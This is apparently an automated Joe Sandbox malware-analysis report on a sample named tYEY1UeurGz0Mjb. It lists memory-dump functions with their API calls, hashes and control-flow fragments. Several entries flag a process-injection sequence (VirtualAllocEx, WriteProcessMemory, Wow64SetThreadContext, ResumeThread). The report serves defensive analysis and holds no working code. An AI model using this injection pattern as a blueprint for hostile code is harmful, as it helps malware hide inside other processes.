                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05241E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: a4ca09983af36f1761c8136de33b4610082260708905fe21a7f2372c13059a88
                                            • Instruction ID: 26c130787a1bdb9dd3c64d48a12cf51f080ca9a6a4d488597c074cecc5d83863
                                            • Opcode Fuzzy Hash: a4ca09983af36f1761c8136de33b4610082260708905fe21a7f2372c13059a88
                                            • Instruction Fuzzy Hash: 3B51D3B5D10309DFDB14CF99C984ADEBBB6FF48300F64812AE819AB250D7759985CF90
                                            Function 05240BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 809 5240bfc-52442fc 812 5244302-5244307 809->812 813 52443ac-52443cc call 5240ad4 809->813 814 5244309-5244340 812->814 815 524435a-5244392 CallWindowProcW 812->815 821 52443cf-52443dc 813->821 822 5244342-5244348 814->822 823 5244349-5244358 814->823 818 5244394-524439a 815->818 819 524439b-52443aa 815->819 818->819 819->821 822->823 823->821
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05244381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: a07e40a00d48cea30806fe3f2a710bc0586258cafccd4318a6973f8c2472207e
                                            • Instruction ID: fac8fe566b55ed153149b5ee86729eab104aad83a08215b68e8fe1d93b7e28ca
                                            • Opcode Fuzzy Hash: a07e40a00d48cea30806fe3f2a710bc0586258cafccd4318a6973f8c2472207e
                                            • Instruction Fuzzy Hash: BB413AB4910205CFDB18DF99C448BAABBF6FF88714F24C459E519AB361D774A841CFA0
                                            Function 013C449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 826 13c449c-13c59d9 CreateActCtxA 829 13c59db-13c59e1 826->829 830 13c59e2-13c5a3c 826->830 829->830 837 13c5a3e-13c5a41 830->837 838 13c5a4b-13c5a4f 830->838 837->838 839 13c5a60 838->839 840 13c5a51-13c5a5d 838->840 842 13c5a61 839->842 840->839 842->842
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013C59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: d41e5bcca2db24025818c994d141dc6f20e42f3db78d3d6fbccd73f50fc86562
                                            • Instruction ID: 49aef013b593666d1e02492dc02b04116cec167f7df1754f519a56ec5a03abf6
                                            • Opcode Fuzzy Hash: d41e5bcca2db24025818c994d141dc6f20e42f3db78d3d6fbccd73f50fc86562
                                            • Instruction Fuzzy Hash: 9541F5B0D0071DCBDB24DF9AC8847DDBBB5BF49704F10806AD408AB251D7756949CF91
                                            Function 076688B8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07668950
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: fbd7519ea49831df694eedf8c8ef7a52b04b4396e9b07aff54a251b89e4a93f4
                                            • Instruction ID: a179067fe80e0b0ccc64ad153e25cf76bc74d2648e4315b03f127769df0dbc8f
                                            • Opcode Fuzzy Hash: fbd7519ea49831df694eedf8c8ef7a52b04b4396e9b07aff54a251b89e4a93f4
                                            • Instruction Fuzzy Hash: 16216BB59003099FCB10CFAAC885BEEBBF5FF48310F508429E959A7340D778A944CBA1
                                            Function 07668720 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076687A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 2d11d9bfc39ea48d90deb95eb72c29b55ea46c9f28565754ac5faf3f2438de0a
                                            • Instruction ID: eef7fbf695d5f8222a8e0ede53b726f72726e0d21db93e257f98c9a8ca2d7670
                                            • Opcode Fuzzy Hash: 2d11d9bfc39ea48d90deb95eb72c29b55ea46c9f28565754ac5faf3f2438de0a
                                            • Instruction Fuzzy Hash: 762159B59002099FCB10DFAAC4857EEBFF5EF88310F50842AD419A7240CB789985CFA1
                                            Function 076688C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07668950
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 353d9a6e1a43112dc03dc1950969584dbc0f3ad1db3745858c1ee30216163bf7
                                            • Instruction ID: 06d9245730047f3ad1e744dbac6660f7cf4d73b644fdd920688e9aed2309b03c
                                            • Opcode Fuzzy Hash: 353d9a6e1a43112dc03dc1950969584dbc0f3ad1db3745858c1ee30216163bf7
                                            • Instruction Fuzzy Hash: 4A2139B19003499FCB10DFAAC885BEEBBF5FF48310F508429E959A7240D778A944CBA1
                                            Function 076689A9 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07668A30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: eaf981df90b3c744554f0dae66168ef02a427f1403dda517ea69f99dead9c908
                                            • Instruction ID: e453c9ddcd671f2121a60d8015c71a8b5dbdb1c3643a5cd5cc0ae38319678cfe
                                            • Opcode Fuzzy Hash: eaf981df90b3c744554f0dae66168ef02a427f1403dda517ea69f99dead9c908
                                            • Instruction Fuzzy Hash: 8C2139B5C002499FCB10DFAAC885AEEFBF5FF4C310F50842AE919A7240C7399945CBA1
                                            Function 013CC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD2C6,?,?,?,?,?), ref: 013CD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 200cad56681de9f745556cb18f87d1dbcafd3280aaa2729f96aef56ff7bed8ff
                                            • Instruction ID: 22c15c460bd805bdf23e96e0d3ce588614e8bcebdbe15e94abcf958d41b822f8
                                            • Opcode Fuzzy Hash: 200cad56681de9f745556cb18f87d1dbcafd3280aaa2729f96aef56ff7bed8ff
                                            • Instruction Fuzzy Hash: C521E6B59003089FDB10CF9AD984ADEBFF9FB48710F14841AE918A7350D378A954CFA5
                                            Function 07668728 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076687A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: f04955a9517e17b8ee2f09af9860c3baaf49d1f2fc3b938ef2cf948702585eda
                                            • Instruction ID: 78ae2e51637c6cb2da234e38ae6bbf1a586a2aadeb5ab087d541fc6a9a2f55df
                                            • Opcode Fuzzy Hash: f04955a9517e17b8ee2f09af9860c3baaf49d1f2fc3b938ef2cf948702585eda
                                            • Instruction Fuzzy Hash: 592135B1D002098FDB10DFAAC4857EEBFF5EF88310F54842AD419A7240CB78A984CFA1
                                            Function 076689B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07668A30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 10340c978d745f578b33fe3315e6a9a44360fc5a8ceb89b4014845149e4d6e58
                                            • Instruction ID: d688d2bfa3d4637558cfd75f9453839416b8b9dc862b1dd050c223eae8f3b295
                                            • Opcode Fuzzy Hash: 10340c978d745f578b33fe3315e6a9a44360fc5a8ceb89b4014845149e4d6e58
                                            • Instruction Fuzzy Hash: DE2137B1C003499FCB10DFAAC885AEEFBF5FF48310F50842AE919A7240C7389944CBA1
                                            Function 013CD2F9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD2C6,?,?,?,?,?), ref: 013CD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a0398befbd4d02868215a8ff972dcf49948131c173d3a7134991c03cda86bfc8
                                            • Instruction ID: 000fac00cb1e6f59e59878056462fc538f9eb744469d57845ddc9bb4d61f0b48
                                            • Opcode Fuzzy Hash: a0398befbd4d02868215a8ff972dcf49948131c173d3a7134991c03cda86bfc8
                                            • Instruction Fuzzy Hash: FB21E2B59002089FDB10CFAAD984ADEBBF5FB48714F14841AE918A3350D378A954CFA1
                                            Function 076687F8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766886E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 985383cab195925cbdf3a27059ec02f268ea57162f0d13e72d43ac7fbdd6e9b6
                                            • Instruction ID: 64214668a52f9b94f2905a8f5d3adbb59df5c244bd7d53bee578753b0de608a0
                                            • Opcode Fuzzy Hash: 985383cab195925cbdf3a27059ec02f268ea57162f0d13e72d43ac7fbdd6e9b6
                                            • Instruction Fuzzy Hash: DA1159B19002499FCB10DFAAC8447EEBFF5EF88710F24881EE519A7250C73A9540CFA1
                                            Function 013CA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013CB101,00000800,00000000,00000000), ref: 013CB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 0141c018effe1685a1370d9508a5197d0db3d51e1cbf4919a38575757d175465
                                            • Instruction ID: c933a5e28a691b810bb0ad6746a7b70b9d99bcbb10e5dd661129f12810a40212
                                            • Opcode Fuzzy Hash: 0141c018effe1685a1370d9508a5197d0db3d51e1cbf4919a38575757d175465
                                            • Instruction Fuzzy Hash: 3A1114B68003488FDB10CF9AC445ADEFBF9EB48714F10842ED919A7200C379A945CFA5
                                            Function 013CB2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013CB101,00000800,00000000,00000000), ref: 013CB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 4d458dc65385e0bdf6bd0c6506c1d58c4571282e49108d8ca113185626ebf8a0
                                            • Instruction ID: 7ae984d3a5539cf3770d2248ff749c23745c02915b19cc92e35d64f3bc810f03
                                            • Opcode Fuzzy Hash: 4d458dc65385e0bdf6bd0c6506c1d58c4571282e49108d8ca113185626ebf8a0
                                            • Instruction Fuzzy Hash: AF1114B68002488FDB10CFAAC844ADEFBF9EB48710F14841EE959A7200C379A545CFA5
                                            Function 07668800 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766886E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 09c2a1b15d5225454f9d38cfb1c9e53d49be5002402c69006dfa0d33509d42c6
                                            • Instruction ID: cf2fec990bc3b8099758163ade2f94fffce02b1d0a39f9cdb85a01e53ae9c509
                                            • Opcode Fuzzy Hash: 09c2a1b15d5225454f9d38cfb1c9e53d49be5002402c69006dfa0d33509d42c6
                                            • Instruction Fuzzy Hash: 321137B19002499FCB10DFAAC845AEEBFF5FF88710F148819E519A7250C779A944CFA1
                                            Function 07668671 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(00000067), ref: 076686DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: c1f55ad948bf9d17dcd5ff5d65c220d2a9ececba1db47d2561d149ec4a8e81ad
                                            • Instruction ID: 3ac5dc90464f7eff938e111e9ee24ee9a7cca4fdda663089469ac88ccfd25a6c
                                            • Opcode Fuzzy Hash: c1f55ad948bf9d17dcd5ff5d65c220d2a9ececba1db47d2561d149ec4a8e81ad
                                            • Instruction Fuzzy Hash: 10115BB19002498FCB14DFAAC4457EEFFF5AF88320F20841AD45AB7240C7399544CB95
                                            Function 0766AD54 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0766BAF1,?,?), ref: 0766BC98
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 425879ae33ed83dd8d0773aaa9ec751a0cd59be5c00fffd1d69bace9db15cb6f
                                            • Instruction ID: 6d84ba1dbb4c4efb0b27b7d24694bd67dfc2bef588329624c756edb6063c9631
                                            • Opcode Fuzzy Hash: 425879ae33ed83dd8d0773aaa9ec751a0cd59be5c00fffd1d69bace9db15cb6f
                                            • Instruction Fuzzy Hash: 021125B1800649DFDB10DF9AC549BEEBBF4EB48320F208819D959A7340D779AA44CFA5
                                            Function 07668678 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(00000067), ref: 076686DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: e6f714bc6a068b5bc41e2094aee2f592b2dc85614be6c53a8bad36ac40269eae
                                            • Instruction ID: f4041c70484cef9ac65288d5944d1a5f8ad6fdbff32c52442b241dcd9e5835a6
                                            • Opcode Fuzzy Hash: e6f714bc6a068b5bc41e2094aee2f592b2dc85614be6c53a8bad36ac40269eae
                                            • Instruction Fuzzy Hash: 0E113AB1D002498FCB10DFAAC4457EEFBF5EF88314F208419D51AA7240CB79A544CBA5
                                            Function 013CB019 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013CB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: e90cd9ad63d41990e6069c6c7de41de678bbadce677bf220ee98ef0a8c009b4a
                                            • Instruction ID: 19576bbee06e010b210fc456c1b1928a2c3c2f22ed6ab53a92be393bf2142773
                                            • Opcode Fuzzy Hash: e90cd9ad63d41990e6069c6c7de41de678bbadce677bf220ee98ef0a8c009b4a
                                            • Instruction Fuzzy Hash: 351132B6C003488FDB20CFAAC444ADEFBF4EB48614F10841AD969A3200C379A549CFA1
                                            Function 0766BC38 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0766BAF1,?,?), ref: 0766BC98
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 36647773e02caa557eaefc5c76cf1e863fad3463b79306cd47ef766548a6a0a4
                                            • Instruction ID: 6bf8b42a49b491fc3b84966152b0648c1552d109fe47f2948e9014c14eb5b778
                                            • Opcode Fuzzy Hash: 36647773e02caa557eaefc5c76cf1e863fad3463b79306cd47ef766548a6a0a4
                                            • Instruction Fuzzy Hash: 101136B5800649CFDB10DF9AC549BEEBBF5EF48320F20841AD559A7340D738A544CFA5
                                            Function 0766AB7C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766B26D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: b4b74db2cfd885ebb05cc11a72f61e254450a09dc492d9c025cafb80c39bbeb8
                                            • Instruction ID: 0fdb0ae4a300bd31a4adf5f8f5183023c32dee4cd1b22c765f3cce6c717a3482
                                            • Opcode Fuzzy Hash: b4b74db2cfd885ebb05cc11a72f61e254450a09dc492d9c025cafb80c39bbeb8
                                            • Instruction Fuzzy Hash: 4D1106B5800349DFDB10DF9AC449BEEBBF8FB48710F208419E519A7200C379A944CFA5
                                            Function 013CB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013CB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: f8291d5ee8b7db620acba85fdfd50f4d428776782168f9dfc85405be7dbc94bf
                                            • Instruction ID: bdefd4d34302db0c89935388478956dc67b0473b9656174b6fb0f1dfc12667b2
                                            • Opcode Fuzzy Hash: f8291d5ee8b7db620acba85fdfd50f4d428776782168f9dfc85405be7dbc94bf
                                            • Instruction Fuzzy Hash: B5110FB6C003498FDB20DF9AC444A9EFBF4AB88614F10841AD929A7210C379A949CFA1
                                            Function 0766B208 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766B26D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 3625f84b2218c46715243b5d4cd9771e537a26556e00bbafeaf3890cfb7b826d
                                            • Instruction ID: bc05a98bb50b74dfb326ac1ac85eac8b983fa99840d58d0112b545834d2471e9
                                            • Opcode Fuzzy Hash: 3625f84b2218c46715243b5d4cd9771e537a26556e00bbafeaf3890cfb7b826d
                                            • Instruction Fuzzy Hash: 3311F5B58002499FCB10DF9AD489BEEBBF8FB48310F20841AE559A7210C3756584CFA1
                                            Function 0128D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000729752.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_128d000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 760460bdf02f667fdd8785aa4475b96e4a2b08bf5e2d98b101d2f7a72c7f5b39
                                            • Instruction ID: d3b5bca45ae9f6d87d2f0a0a414f3c148368d204d53b311bc9e1ea16c8ca0bef
                                            • Opcode Fuzzy Hash: 760460bdf02f667fdd8785aa4475b96e4a2b08bf5e2d98b101d2f7a72c7f5b39
                                            • Instruction Fuzzy Hash: 94212271614208DFDB15EFA8D980B26BF65FB88314F20C56DD90A4B3D6C37AD40BCA62
                                            Function 0128D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000729752.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_128d000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e24ee96154b8baf449920828f147a8345bf06d12992d5117d8eab09c30e393f
                                            • Instruction ID: 9cfd7891ca059bed699af924eb71d13f95edc1fc53446471ae45d2c717806b2b
                                            • Opcode Fuzzy Hash: 6e24ee96154b8baf449920828f147a8345bf06d12992d5117d8eab09c30e393f
                                            • Instruction Fuzzy Hash: EE21F571564208DFDB05EFA8D5C0F26BB65FB84324F20C56DD9094B2DBC37AD80ACA61
                                            Function 0128D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000729752.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_128d000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 78190a1c954c72cdc420a23c7b43d4e13bb1fef1c8b44c385d523c6067af9543
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 3911BB75544284DFDB02DF58C5C4B15BFA1FB84324F24C6A9D9494B29BC33AD41ACB62
                                            Function 0128D017 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000729752.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_128d000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 772811ec97fea755c6e4385baa36785b26daa9d88610cd12f6b62d9d1ed3fbc3
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: F211BB75504284CFDB12DF58D5C4B15BFA2FB88314F24C6AAD9494B696C33AD40BCBA2

                                            Non-executed Functions

                                            Function 05240040 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c1720c0c6c8bb062c66c7a006488c3347ecb55f564de2523cb2e3c13357387d
                                            • Instruction ID: 381959ef733414b50c9529ccc39a86ce00ac7bcd1e7162b7a3f3a8b127df9f11
                                            • Opcode Fuzzy Hash: 8c1720c0c6c8bb062c66c7a006488c3347ecb55f564de2523cb2e3c13357387d
